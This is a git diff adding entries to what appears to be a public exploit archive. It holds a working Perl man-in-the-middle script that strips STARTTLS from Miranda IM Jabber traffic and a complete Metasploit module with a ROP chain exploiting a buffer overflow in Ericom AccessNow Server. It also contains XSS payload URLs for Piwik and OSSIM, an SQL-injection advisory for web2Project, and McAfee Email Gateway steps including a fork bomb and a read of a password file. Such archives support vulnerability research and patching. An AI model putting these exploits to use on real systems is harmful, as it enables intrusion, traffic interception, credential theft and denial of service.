diff --git a/files.csv b/files.csv
index 4416f5e7a..7ecf8ad17 100755
--- a/files.csv
+++ b/files.csv
@@ -30460,3 +30460,9 @@ id,file,description,date,author,platform,type,port
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0
33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress 'plugins.php' SQL Injection Vulnerability",2008-12-13,MustLive,php,webapps,0
+33814,platforms/php/webapps/33814.txt,"Piwik <= 0.5.5 'form_url' Parameter Cross Site Scripting Vulnerability",2010-03-31,garwga,php,webapps,0
+33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 '$_SERVER['PHP_SELF']' Parameter Cross Site Scripting Vulnerability",2010-03-31,"CONIX Security",php,webapps,0
+33816,platforms/multiple/remote/33816.pl,"Miranda IM <= 0.8.16 Information Disclosure Vulnerability",2010-04-06,"Jan Schejbal",multiple,remote,0
+33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080
+33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80
+33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
diff --git a/platforms/multiple/remote/33816.pl b/platforms/multiple/remote/33816.pl
new file mode 100755
index 000000000..0de7adddb
--- /dev/null
+++ b/platforms/multiple/remote/33816.pl
@@ -0,0 +1,111 @@
+source: http://www.securityfocus.com/bid/39209/info
+
+Miranda IM is prone to an information-disclosure vulnerability.
+
+Successful exploits of this issue may allow attackers to perform man-in-the-middle attacks against vulnerable applications and to disclose sensitive information.
+
+#!/usr/bin/perl
+
+# Miranda IM TLS MitM Proof of Concept
+# by Jan Schejbal, 2010-03-19
+
+# MAY WORK WITHOUT MODIFICATIONS AGAINST OTHER CLIENTS WITH THIS ISSUE!
+# Generally: Will work if client also accepts unencrypted connections
+# if the server reports that TLS is not supported.
+
+# Tested only on WinXP SP3 with ActivePerl 5.10.0
+# against Miranda 0.8.16
+
+# Usage:
+# 1. Setup variables below, unless you want to test against jabber.ccc.de
+# (note that this script does not do real XML parsing. Other servers
+# might have slightly different code that will not be detected.
+# In such a case, connecting will lock up. Adapt the RegExp below.)
+# 2. Make 'victim' connect to this server instead of real server
+# Network->Jabber->Account->Manually specify connection host
+# (real attacks would use ARP spoofing, DNS spoofing or similar.)
+# 3. Enable 'Use TLS'
+# (make sure that 'Disable SASL' on advanced is UNCHECKED,
+# as it silently disables TLS!)
+# 4. Start script and connect with miranda
+# 5. If all works, the dump goes to STDOUT, state is shown on STDERR.
+# (All traffic should be sent in plain now!)
+
+
+use strict;
+use warnings;
+
+use IO::Socket;
+use IO::Select;
+
+my $server = 'jabber.ccc.de';
+my $port = 5222;
+my $listenport = $port;
+
+my $sock = new IO::Socket::INET(
+ LocalHost => '0.0.0.0',
+ LocalPort => $listenport,
+ Proto => 'tcp',
+ Listen => 1,
+ Reuse => 1,
+ );
+
+print STDERR "Listening on $listenport for jabber connections\n";
+print STDERR "Will forward to $server:$port\n";
+
+my $client_connection = $sock->accept();
+
+print STDERR "Incoming connection\n";
+
+my $server_connection = new IO::Socket::INET(
+ PeerAddr => $server,
+ PeerPort => $port,
+ Proto => 'tcp',
+ );
+
+print STDERR "Connected to server\n";
+
+$server_connection->blocking(0);
+$client_connection->blocking(0);
+
+
+my $sel = IO::Select->new();
+$sel->add($server_connection);
+$sel->add($client_connection);
+
+my $server_hello_done = 0;
+my $server_hello_data;
+
+my $readdata;
+my @ready;
+while(@ready = $sel->can_read()) {
+ foreach my $ready_conn (@ready) {
+ if (!sysread($ready_conn, $readdata, 10000)) {
+ print STDERR "\nReading failed!\n";
+ exit(1);
+ }
+ print "$readdata\n";
+ if ($ready_conn == $server_connection) {
+ # read was from server
+ if (!$server_hello_done) {
+ $server_hello_data .= $readdata;
+ print STDERR "\nCurrent server hello buf: $server_hello_data\n\n";
+ if ($server_hello_data =~ s|||) {
+ print STDERR "removed STARTTLS offer from server hello\n";
+ $server_hello_done = 1;
+ print $client_connection $server_hello_data;
+ print STDERR "\nforwarded cached server hello buf: \n$server_hello_data\n\n";
+ print STDERR "MitM complete. Forwarding data ('<' = to client, '>' = to server)\n";
+ }
+ } else {
+ print $client_connection $readdata;
+ if ($server_hello_done) { print STDERR '<'; }
+ }
+
+ } else {
+ # read was from client, send to server
+ print $server_connection $readdata;
+ if ($server_hello_done) { print STDERR '>'; }
+ }
+ }
+}
diff --git a/platforms/php/webapps/33814.txt b/platforms/php/webapps/33814.txt
new file mode 100755
index 000000000..176e1b3c3
--- /dev/null
+++ b/platforms/php/webapps/33814.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39144/info
+
+Piwik is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Piwik 0.6 are vulnerable.
+
+http://www.example.com/index.php?form_url=>">
\ No newline at end of file
diff --git a/platforms/php/webapps/33815.txt b/platforms/php/webapps/33815.txt
new file mode 100755
index 000000000..b485d8bd6
--- /dev/null
+++ b/platforms/php/webapps/33815.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39145/info
+
+OSSIM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+OSSIM 2.2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ossim/control_panel/alarm_console.php/">
+http://www.example.com/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');//
\ No newline at end of file
diff --git a/platforms/php/webapps/33818.txt b/platforms/php/webapps/33818.txt
new file mode 100755
index 000000000..0eb6b2e6f
--- /dev/null
+++ b/platforms/php/webapps/33818.txt
@@ -0,0 +1,82 @@
+Advisory ID: HTB23213
+Product: web2Project
+Vendor: http://web2project.net
+Vulnerable Version(s): 3.1 and probably prior
+Tested Version: 3.1
+Advisory Publication: April 30, 2014 [without technical details]
+Vendor Notification: April 30, 2014
+Vendor Patch: May 1, 2014
+Public Disclosure: June 18, 2014
+Vulnerability Type: SQL Injection [CWE-89]
+CVE Reference: CVE-2014-3119
+Risk Level: High
+CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web2Project, which can be exploited to perform SQL Injection attacks and gain complete access to vulnerable website.
+
+
+1) SQL Injection in web2Project: CVE-2014-3119
+
+
+1.1 The vulnerability exists due to insufficient sanitization of the "search_string" HTTP POST parameter passed to "/index.php" script. A remote authenticated user with privileges to access "contacts" module can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website.
+
+The following exploitation example displays version of the MySQL Server:
+
+
+
+
+
+1.2 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP POST parameter passed to "/do_updatecontact.php". This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website.
+
+The following exploitation example writes the word "immuniweb" into file "file.txt", depending on MySQL configuration and filesystem permissions:
+
+
+
+
+
+1.3 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP GET parameter passed to "/updatecontact.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in application’s database and e.g. create, alter and delete information, or gain unauthorized access to vulnerable website.
+
+The following exploitation example writes the word "immuniweb" info file "file.txt", depending on MySQL configuration and filesystem permissions:
+
+
+
+
+
+Successful exploitation of the vulnerabilities can grant an attacker unrestricted access to the website and its database.
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Apply vendor fixes:
+https://github.com/web2project/web2project/commit/eead99b36f62a8222d9f3a913f1a2268200687ef
+https://github.com/web2project/web2project/commit/ab5ba92a6aaf0435cd0b2132cf7f9b7b41575a28
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23213 - https://www.htbridge.com/advisory/HTB23213 - Multiple SQL Injection Vulnerabilities in web2Project.
+[2] web2Project - http://web2project.net/ - web2Project is a Free Open Source business-oriented Project Management System (PMS) built for the future.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/windows/dos/33819.txt b/platforms/windows/dos/33819.txt
new file mode 100755
index 000000000..bf37dc389
--- /dev/null
+++ b/platforms/windows/dos/33819.txt
@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/39242/info
+
+McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including:
+
+A local privilege-escalation vulnerability
+A denial-of-service vulnerability.
+Multiple cross-site scripting vulnerabilities
+An information-disclosure vulnerability
+
+An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible.
+
+Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable.
+
+
+Denial of Service:
+
+* In order to run the DoS, follow the steps below:
+[Secure Mail]: command rbash –noprofile
+[Secure Mail]: :(){:|:&};:
+
+Cross-site scripting
+
+https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=&QtnType=9
+
+Information Disclosure
+
+[Secure Mail]: command rbash –noprofile
+[Secure Mail]: grep -a '.*' /etc/pwd.db
+
+Local Privilege-Escalation:
+
+[Secure Mail]: command rbash –noprofile
+[Secure Mail]: declare -x USER="admin"
+If you want to check the new privilege:
+[Secure Mail]: cmd_admin set user unlock
+*** Invalid command: Usage - set user unlock ***
+[Secure Mail]: cmd_admin set user unlock admin
+Cannot unlock yourself.
+[Secure Mail]: exi
+
diff --git a/platforms/windows/remote/33817.rb b/platforms/windows/remote/33817.rb
new file mode 100755
index 000000000..532bb994d
--- /dev/null
+++ b/platforms/windows/remote/33817.rb
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Ericom AccessNow Server Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
+ vulnerability is due to an insecure usage of vsprintf with user controlled data,
+ which can be triggered with a malformed HTTP request. This module has been tested
+ successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
+ Server SP2.
+ },
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability Discovery
+ 'juan vazquez', # Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['ZDI', '14-160'],
+ ['CVE', '2014-3913'],
+ ['BID', '67777'],
+ ['URL','http://www.ericom.com/security-ERM-2014-610.asp']
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Payload' =>
+ {
+ 'Space' => 4096,
+ 'BadChars' => "\x00\x0d\x0a",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ },
+ 'Targets' =>
+ [
+ [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
+ {
+ 'RopOffset' => 62,
+ 'Offset' => 30668,
+ 'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Jun 2 2014',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(8080)], self.class)
+ end
+
+
+ def check
+ res = send_request_cgi({
+ 'uri' => '/AccessNow/start.html'
+ })
+
+ unless res && res.code == 200 && res.headers['Server']
+ return Exploit::CheckCode::Safe
+ end
+
+ if res.headers['Server'] =~ /Ericom AccessNow Server/
+ return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
+ elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
+ return Exploit::CheckCode::Detected # Ericom AccessNow 3
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+ def exploit_uri
+ uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
+ uri << rand_text(target['RopOffset'])
+ uri << create_rop_chain
+ uri << payload.encoded
+ uri << rand_text(target['Offset'] - uri.length)
+ uri << rand_text(4) # nseh
+ uri << [target.ret].pack("V") # seh
+
+ uri
+ end
+
+ def exploit
+ print_status("#{peer} - Sending malformed request...")
+ send_request_raw({
+ 'method' => 'GET',
+ 'uri' => exploit_uri,
+ 'encode' => false
+ }, 1)
+ end
+
+ def create_rop_chain
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets =
+ [
+ 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
+ 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
+ 0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
+ 0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
+ 0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
+ 0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]
+ 0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]
+ 0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]
+ 0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]
+ 0xffffffff, # Value to negate, will become 0x00000001
+ 0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]
+ 0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]
+ 0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]
+ 0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)
+ 0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]
+ 0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]
+ 0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]
+ 0xffffffc0, # Value to negate, will become 0x00000040
+ 0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]
+ 0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]
+ 0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]
+ 0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]
+ 0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]
+ 0x90909090, # nop
+ 0x1052cfce # PUSHAD # RETN [AccessNowAccelerator32.dll]
+ ].pack("V*")
+
+ rop_gadgets
+ end
+
+end
\ No newline at end of file